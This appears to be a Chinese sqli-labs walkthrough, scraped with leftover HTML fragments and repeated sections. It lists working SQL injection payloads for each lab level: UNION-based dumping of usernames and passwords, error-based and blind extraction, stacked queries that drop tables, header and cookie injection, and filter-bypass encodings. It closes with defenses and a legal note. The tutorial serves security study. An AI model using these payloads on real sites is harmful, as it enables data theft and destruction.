SQL注入攻防实战：sqli-labs通关详解<\/h1>

1. SQL注入基础概念<\/h2>
SQL注入是一种将恶意SQL代码插入到应用程序输入参数中的攻击技术，攻击者可以利用这种技术绕过安全措施，获取数据库中的敏感信息或执行未授权的数据库操作。<\/p>

1.1 注入类型分类<\/h3>

按注入点类型分类<\/strong>：<\/p>

数字型注入：参数未被引号包裹，直接参与SQL查询<\/li>
字符型注入：参数被单引号或双引号包裹<\/li> <\/ul> <\/li>

按攻击方式分类<\/strong>：<\/p>

联合查询注入(UNION-Based)<\/li>
报错注入(Error-Based)<\/li>
布尔盲注(Boolean Blind)<\/li>
时间盲注(Time-Based)<\/li>
堆叠注入(Stacked Queries)<\/li>
二次注入(Second-Order Injection)<\/li> <\/ul> <\/li> <\/ol>
2. 基础注入技术<\/h2>
2.1 联合查询注入(UNION-Based)<\/h3>
基本步骤<\/strong>：<\/p>

判断注入点类型<\/li>
确定字段数量<\/li>
寻找回显位<\/li>
获取数据库信息<\/li>
提取表名和列名<\/li>
获取数据<\/li> <\/ol>
示例(Less-1)<\/strong>：<\/p>
?<\/span>id=<\/span>1<\/span>' order by 3 --+ # 确定列数为3 <\/span><\/span><\/span>?id=-1'<\/span> union<\/span> select<\/span> 1<\/span>,2<\/span>,3<\/span> --+ # 判断回显位为2,3 <\/span><\/span><\/span><\/span>?<\/span>id=-<\/span>1<\/span>' union select 1,database(),version() --+ # 查数据库名和版本 <\/span><\/span><\/span>?id=-1'<\/span> union<\/span> select<\/span> 1<\/span>,2<\/span>,group_concat(table_name<\/span>) from<\/span> information_schema.tables where<\/span> table_schema=<\/span>'security'<\/span>--+ # 获取表名 <\/span><\/span><\/span><\/span>?<\/span>id=-<\/span>1<\/span>' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='<\/span>users'--+ # 获取列名 <\/span><\/span><\/span>?id=-1'<\/span> union<\/span> select<\/span> 1<\/span>,2<\/span>,group_concat(username,'~'<\/span>,password) from<\/span> users--+ # 获取数据 <\/span><\/span><\/span><\/code><\/pre>2.2 报错注入(Error-Based)<\/h3> 常用函数<\/strong>：<\/p> updatexml()<\/code><\/li> extractvalue()<\/code><\/li> floor()<\/code><\/li> <\/ul> 示例(Less-5)<\/strong>：<\/p> ?<\/span>id=<\/span>1<\/span>' and updatexml(1,concat(0x7e,database(),0x7e),1)--+ # 获取数据库名 <\/span><\/span><\/span>?id=1'<\/span> and<\/span> updatexml(1<\/span>,concat(0<\/span>x7e,(select<\/span> group_concat(table_name<\/span>) from<\/span> information_schema.tables where<\/span> table_schema=<\/span>database<\/span>()),0<\/span>x7e),1<\/span>)--+ # 获取表名 <\/span><\/span><\/span><\/span>?<\/span>id=<\/span>1<\/span>' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='<\/span>users'),0x7e),1)--+ # 获取列名 <\/span><\/span><\/span><\/code><\/pre>2.3 布尔盲注(Boolean Blind)<\/h3> 特点<\/strong>：页面根据条件真\/假返回不同结果<\/p> 示例(Less-8)<\/strong>：<\/p> ?<\/span>id=<\/span>1<\/span>' and length(database())=8 --+ # 判断数据库名长度 <\/span><\/span><\/span>?id=1'<\/span> and<\/span> substr(database<\/span>(),1<\/span>,1<\/span>)=<\/span>'s'<\/span>--+ # 逐字符猜解数据库名 <\/span><\/span><\/span><\/span>?<\/span>id=<\/span>1<\/span>' and (select count(table_name) from information_schema.tables where table_schema=database())=4 --+ # 猜解表的数量 <\/span><\/span><\/span><\/code><\/pre>2.4 时间盲注(Time-Based)<\/h3> 特点<\/strong>：通过响应时间差异判断条件真假<\/p> 示例(Less-9)<\/strong>：<\/p> ?<\/span>id=<\/span>1<\/span>' and If(ascii(substr(database(),1,1))=115,sleep(5),1)--+ # 第一位是'<\/span>s' <\/span><\/span><\/span>?id=1'<\/span> and<\/span> If<\/span>(ascii(substr((select<\/span> table_name<\/span> from<\/span> information_schema.tables where<\/span> table_schema=<\/span>'security'<\/span> limit<\/span> 0<\/span>,1<\/span>),1<\/span>,1<\/span>))=<\/span>101<\/span>,sleep(5<\/span>),1<\/span>)--+ # 猜表名 <\/span><\/span><\/span><\/code><\/pre>3. 高级注入技术<\/h2> 3.1 堆叠注入(Stacked Queries)<\/h3> 特点<\/strong>：执行多条SQL语句，破坏性强<\/p> 示例(Less-38)<\/strong>：<\/p> ?<\/span>id=<\/span>1<\/span>';CREATE TABLE WhiteMoon LIKE users;--+ # 创建表 <\/span><\/span><\/span>?id=1'<\/span>;INSERT<\/span> INTO<\/span> WhiteMoon SELECT<\/span> *<\/span> FROM<\/span> users;--+ # 插入数据 <\/span><\/span><\/span><\/span>?<\/span>id=<\/span>1<\/span>';DELETE FROM WhiteMoon;--+ # 删除数据 <\/span><\/span><\/span>?id=1'<\/span>;DROP<\/span> TABLE<\/span> WhiteMoon;--+ # 删除表 <\/span><\/span><\/span><\/code><\/pre>3.2 二次注入(Second-Order Injection)<\/h3> 特点<\/strong>：恶意数据先被存储，后被使用<\/p> 示例(Less-24)<\/strong>：<\/p> 创建用户：admin'#\/123456<\/code><\/li> 登录后修改密码：admin\/111\/111<\/code><\/li> 实际执行的SQL：<\/li> <\/ol> UPDATE<\/span> users SET<\/span> PASSWORD=<\/span>'111'<\/span> where<\/span> username=<\/span>'admin'<\/span>#<\/span>' and password='<\/span>111<\/span>' <\/span><\/span><\/span><\/code><\/pre>3.3 宽字节注入<\/h3> 原理<\/strong>：利用GBK编码特性绕过转义<\/p> 示例(Less-32)<\/strong>：<\/p> ?<\/span>id=<\/span>1<\/span>%<\/span>df' # 吃掉转义反斜杠 <\/span><\/span><\/span>?id=1%df'<\/span> UNION<\/span> SELECT<\/span> 1<\/span>,database<\/span>(),3<\/span> --+ # 获取数据库名 <\/span><\/span><\/span><\/code><\/pre>3.4 HTTP参数污染(HPP)<\/h3> 原理<\/strong>：提交多个同名参数绕过WAF<\/p> 示例(Less-29)<\/strong>：<\/p> ?<\/span>id=<\/span>1<\/span>&<\/span>id=<\/span>2<\/span>'--+ # 第一个参数绕过WAF，第二个参数注入 <\/span><\/span><\/span>?id=1&id=-1'<\/span> UNION<\/span> SELECT<\/span> 1<\/span>,database<\/span>(),3<\/span> --+ # 获取数据库名 <\/span><\/span><\/span><\/code><\/pre>4. 特殊场景注入<\/h2> 4.1 POST注入<\/h3> 特点<\/strong>：注入点在POST请求中<\/p> 示例(Less-11)<\/strong>：<\/p> uname=<\/span>a' union select 1,database() # # 获取数据库名 <\/span><\/span><\/span>uname=a'<\/span> union<\/span> select<\/span> 1<\/span>,group_concat(table_name<\/span>) from<\/span> information_schema.tables where<\/span> table_schema=<\/span>"security"<\/span> -- a # 获取表名 <\/span><\/span><\/span><\/code><\/pre>4.2 Cookie注入<\/h3> 示例(Less-20)<\/strong>：<\/p> Cookie: uname=<\/span>admin<\/span>' and updatexml(1,concat(1,database()),1) and '<\/span> #<\/span> 获取数据库名<\/span> <\/span><\/span><\/code><\/pre>4.3 User-Agent\/Referer注入<\/h3> 示例(Less-18)<\/strong>：<\/p> User<\/span>-<\/span>Agent: ' OR updatexml(1,concat("!",database()),2) OR '<\/span> #<\/span> 获取数据库名<\/span> <\/span><\/span><\/code><\/pre>4.4 排序注入(Order By)<\/h3> 示例(Less-46)<\/strong>：<\/p> ?<\/span>sort=<\/span>1<\/span> AND<\/span> updatexml(1<\/span>,concat("!"<\/span>,database<\/span>()),2<\/span>)#<\/span> #<\/span> 获取数据库名<\/span> <\/span><\/span><\/code><\/pre>5. 绕过技术<\/h2> 5.1 注释符绕过<\/h3> --+ # MySQL注释 <\/span><\/span><\/span><\/span>#<\/span> #<\/span> URL编码为<\/span>%<\/span>23<\/span> <\/span><\/span>;%<\/span>00<\/span> #<\/span> 空字节截断<\/span> <\/span><\/span><\/code><\/pre>5.2 空格绕过<\/h3> %<\/span>09<\/span> #<\/span> TAB <\/span><\/span>%<\/span>0<\/span>a #<\/span> 换行<\/span> <\/span><\/span>%<\/span>0<\/span>b #<\/span> 垂直<\/span>TAB <\/span><\/span>%<\/span>0<\/span>c<\/span> #<\/span> 换页<\/span> <\/span><\/span>%<\/span>0<\/span>d #<\/span> 回车<\/span> <\/span><\/span>%<\/span>a0 #<\/span> 非中断空格<\/span> <\/span><\/span><\/code><\/pre>5.3 关键词过滤绕过<\/h3> 双写绕过<\/strong>：<\/p> OorRDER BY<\/span> #<\/span> 绕过<\/span>or过滤<\/span> <\/span><\/span>aadnnd 1<\/span>=<\/span>1<\/span> #<\/span> 绕过<\/span>and过滤<\/span> <\/span><\/span><\/code><\/pre>大小写混合<\/strong>：<\/p> UniOn<\/span> SelECT<\/span> <\/span><\/span><\/code><\/pre>编码绕过<\/strong>：<\/p> %<\/span>27<\/span> #<\/span> 单引号<\/span> <\/span><\/span>%<\/span>2527<\/span> #<\/span> 双重<\/span>URL编码单引号<\/span> <\/span><\/span>0<\/span>x61646d696e #<\/span> 十六进制编码<\/span> <\/span><\/span><\/code><\/pre>6. 防御措施<\/h2> 参数化查询<\/strong>：使用预处理语句<\/li> 输入验证<\/strong>：白名单过滤<\/li> 最小权限原则<\/strong>：数据库账户仅需必要权限<\/li> 错误处理<\/strong>：不返回详细错误信息<\/li> WAF<\/strong>：Web应用防火墙<\/li> 编码输出<\/strong>：防止XSS等二次攻击<\/li> <\/ol> 7. 实战技巧总结<\/h2> 信息收集顺序<\/strong>：<\/p> 数据库版本 → 当前用户 → 数据库名 → 表名 → 列名 → 数据<\/li> <\/ul> <\/li> 常用函数<\/strong>：<\/p> database()<\/code> - 当前数据库<\/li> version()<\/code> - 数据库版本<\/li> user()<\/code> - 当前用户<\/li> group_concat()<\/code> - 合并多行结果<\/li> concat_ws()<\/code> - 带分隔符合并<\/li> substr()\/mid()\/left()<\/code> - 字符串截取<\/li> ascii()<\/code> - 获取ASCII码<\/li> <\/ul> <\/li> information_schema关键表<\/strong>：<\/p> schemata<\/code> - 所有数据库<\/li> tables<\/code> - 所有表<\/li> columns<\/code> - 所有列<\/li> <\/ul> <\/li> 盲注优化<\/strong>：<\/p> 使用二分法加速猜解<\/li> 优先猜解长度再猜内容<\/li> 使用脚本自动化过程<\/li> <\/ul> <\/li> <\/ol> 8. 各关卡要点速查<\/h2> 关卡<\/th> 注入类型<\/th> 闭合方式<\/th> 关键技巧<\/th> <\/tr> <\/thead> 1-4<\/td> 联合注入<\/td> 单\/双引号<\/td> 基础联合查询<\/td> <\/tr> 5-6<\/td> 报错\/盲注<\/td> 单\/双引号<\/td> updatexml\/extractvalue<\/td> <\/tr> 7<\/td> 导出文件<\/td> '))<\/td> into outfile<\/td> <\/tr> 8-10<\/td> 盲注<\/td> 单\/双引号<\/td> 布尔\/时间盲注<\/td> <\/tr> 11-14<\/td> POST注入<\/td> 单\/双引号<\/td> POST参数注入<\/td> <\/tr> 15-16<\/td> 盲注<\/td> 单\/双引号<\/td> 无错误回显<\/td> <\/tr> 17<\/td> 更新注入<\/td> 单引号<\/td> 密码字段注入<\/td> <\/tr> 18-19<\/td> 头注入<\/td> User-Agent\/Referer<\/td> HTTP头注入<\/td> <\/tr> 20-22<\/td> Cookie注入<\/td> 单\/双引号<\/td> Cookie字段注入<\/td> <\/tr> 23-26<\/td> 过滤绕过<\/td> 多种<\/td> 注释符\/空格过滤<\/td> <\/tr> 27-28<\/td> 高级过滤<\/td> 多种<\/td> union\/select过滤<\/td> <\/tr> 29-31<\/td> HPP<\/td> 多种<\/td> 参数污染绕过<\/td> <\/tr> 32-37<\/td> 宽字节<\/td> 多种<\/td> GBK编码特性<\/td> <\/tr> 38-45<\/td> 堆叠注入<\/td> 多种<\/td> 多语句执行<\/td> <\/tr> 46-53<\/td> 排序注入<\/td> 多种<\/td> order by注入<\/td> <\/tr> 54-65<\/td> 挑战关卡<\/td> 多种<\/td> 综合技巧应用<\/td> <\/tr> <\/tbody> <\/table> 9. 自动化工具推荐<\/h2> SQLmap<\/strong>：自动化SQL注入工具<\/li> Burp Suite<\/strong>：拦截修改HTTP请求<\/li> Havij<\/strong>：图形化注入工具<\/li> NoSQLMap<\/strong>：NoSQL注入工具<\/li> <\/ol> 10. 法律与道德<\/h2> 仅用于授权测试<\/li> 遵守相关法律法规<\/li> 发现漏洞及时报告<\/li> 不破坏数据完整性<\/li> <\/ol> 通过系统学习sqli-labs各关卡，可以全面掌握SQL注入的各种技术场景和防御方法，建议按照关卡顺序逐步练习，从基础注入到高级绕过技术，最终达到全面理解SQL注入攻防的目的。<\/p>

关卡<\/th>	注入类型<\/th>	闭合方式<\/th>	关键技巧<\/th> <\/tr> <\/thead>
1-4<\/td>	联合注入<\/td>	单\/双引号<\/td>	基础联合查询<\/td> <\/tr>
5-6<\/td>	报错\/盲注<\/td>	单\/双引号<\/td>	updatexml\/extractvalue<\/td> <\/tr>
7<\/td>	导出文件<\/td>	'))<\/td>	into outfile<\/td> <\/tr>
8-10<\/td>	盲注<\/td>	单\/双引号<\/td>	布尔\/时间盲注<\/td> <\/tr>
11-14<\/td>	POST注入<\/td>	单\/双引号<\/td>	POST参数注入<\/td> <\/tr>
15-16<\/td>	盲注<\/td>	单\/双引号<\/td>	无错误回显<\/td> <\/tr>
17<\/td>	更新注入<\/td>	单引号<\/td>	密码字段注入<\/td> <\/tr>
18-19<\/td>	头注入<\/td>	User-Agent\/Referer<\/td>	HTTP头注入<\/td> <\/tr>
20-22<\/td>	Cookie注入<\/td>	单\/双引号<\/td>	Cookie字段注入<\/td> <\/tr>
23-26<\/td>	过滤绕过<\/td>	多种<\/td>	注释符\/空格过滤<\/td> <\/tr>
27-28<\/td>	高级过滤<\/td>	多种<\/td>	union\/select过滤<\/td> <\/tr>
29-31<\/td>	HPP<\/td>	多种<\/td>	参数污染绕过<\/td> <\/tr>
32-37<\/td>	宽字节<\/td>	多种<\/td>	GBK编码特性<\/td> <\/tr>
38-45<\/td>	堆叠注入<\/td>	多种<\/td>	多语句执行<\/td> <\/tr>
46-53<\/td>	排序注入<\/td>	多种<\/td>	order by注入<\/td> <\/tr>
54-65<\/td>	挑战关卡<\/td>	多种<\/td>	综合技巧应用<\/td> <\/tr> <\/tbody> <\/table> 9. 自动化工具推荐<\/h2> SQLmap<\/strong>：自动化SQL注入工具<\/li> Burp Suite<\/strong>：拦截修改HTTP请求<\/li> Havij<\/strong>：图形化注入工具<\/li> NoSQLMap<\/strong>：NoSQL注入工具<\/li> <\/ol> 10. 法律与道德<\/h2> 仅用于授权测试<\/li> 遵守相关法律法规<\/li> 发现漏洞及时报告<\/li> 不破坏数据完整性<\/li> <\/ol> 通过系统学习sqli-labs各关卡，可以全面掌握SQL注入的各种技术场景和防御方法，建议按照关卡顺序逐步练习，从基础注入到高级绕过技术，最终达到全面理解SQL注入攻防的目的。<\/p>

SQL注入攻防实战：sqli-labs通关详解<\/h1>

1. SQL注入基础概念<\/h2> SQL注入是一种将恶意SQL代码插入到应用程序输入参数中的攻击技术，攻击者可以利用这种技术绕过安全措施，获取数据库中的敏感信息或执行未授权的数据库操作。<\/p>

2. 基础注入技术<\/h2>

3. 高级注入技术<\/h2>

4. 特殊场景注入<\/h2>

5. 绕过技术<\/h2>

1. SQL注入基础概念<\/h2>
SQL注入是一种将恶意SQL代码插入到应用程序输入参数中的攻击技术，攻击者可以利用这种技术绕过安全措施，获取数据库中的敏感信息或执行未授权的数据库操作。<\/p>